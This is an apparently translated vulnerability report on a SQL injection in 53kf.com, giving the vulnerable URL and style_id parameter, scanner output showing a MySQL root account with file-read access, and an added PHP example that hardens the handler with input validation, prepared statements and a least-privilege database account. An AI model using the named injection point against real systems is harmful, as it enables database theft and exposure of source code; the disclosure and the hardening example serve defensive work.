### Brief description

A serious SQL injection vulnerability in 53kf.com allows the databases of the main site and several of its sub-sites to be dumped. The MySQL user is root; files cannot be written, but they can be read, so the source code is fully exposed. Since I could not find the admin backend, I have not obtained a webshell for now. Whether or not I get a shell it will probably be 20 Rank either way, so I did not bother. I am borrowing clzzy's description to save typing! Asking for a gift.

### Detailed description

A serious SQL injection vulnerability in 53kf.com allows the databases of the main site and several of its sub-sites to be dumped. The MySQL user is root; files cannot be written, but they can be read, so the source code is fully exposed. Since I could not find the admin backend, I have not obtained a webshell for now. Whether or not I get a shell it will probably be 20 Rank either way, so I did not bother. I am borrowing clzzy's description to save typing! Asking for a gift.

### Proof of vulnerability

```
Target:http://kf1.53kf.com/iframe_brief.php?style_id=%Inject_Here%&language=cn10009
Date:2012/10/11 10:24:38
DB Detection:MySQL >=5 (Auto Detected)
Method:GET
Type:Integer (Auto Detected)
```

Data tables: [tool output listing database and table names]
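
The report identifies `style_id` as an integer-typed GET parameter that reaches the query unfiltered. The following is an added example, not code from the report or from 53kf.com, showing how such a handler can be hardened; the function names, the `styles` table and its columns are hypothetical, and an in-memory SQLite database stands in for MySQL so the example runs offline.

```php
<?php
declare(strict_types=1);

// Hypothetical handler logic for a request like iframe_brief.php?style_id=...
// All names below (parse_style_id, load_style, styles) are assumptions.

/** Accept only a plain decimal integer in a bounded range, else null. */
function parse_style_id(mixed $raw): ?int
{
    if (!is_string($raw)) {
        return null; // missing value or array input such as style_id[]=1
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1, 'max_range' => 2147483647],
    ]);
    return $id === false ? null : $id;
}

/** Look the style up with a bound parameter; the value never enters the SQL text. */
function load_style(PDO $db, int $styleId): ?array
{
    $stmt = $db->prepare('SELECT id, content FROM styles WHERE id = :id');
    $stmt->bindValue(':id', $styleId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Offline stand-in for the production connection. With MySQL, also set
// PDO::ATTR_EMULATE_PREPARES to false so statements are prepared server-side.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE styles (id INTEGER PRIMARY KEY, content TEXT)');
$db->exec("INSERT INTO styles VALUES (7, 'default')");

// Constructed sample inputs: one valid id and three values that must be refused.
foreach (['7', '7 OR 1=1', 'abc', ''] as $raw) {
    $id = parse_style_id($raw);
    if ($id === null) {
        echo 'rejected ' . json_encode($raw) . " -> respond with HTTP 400\n";
        continue;
    }
    echo 'ok ' . json_encode(load_style($db, $id)) . "\n";
}
```

Input handling is only half of the fix: the report notes the application connects as MySQL root and can read files, so the web application should use a dedicated account limited to its own schema and without the global `FILE` privilege.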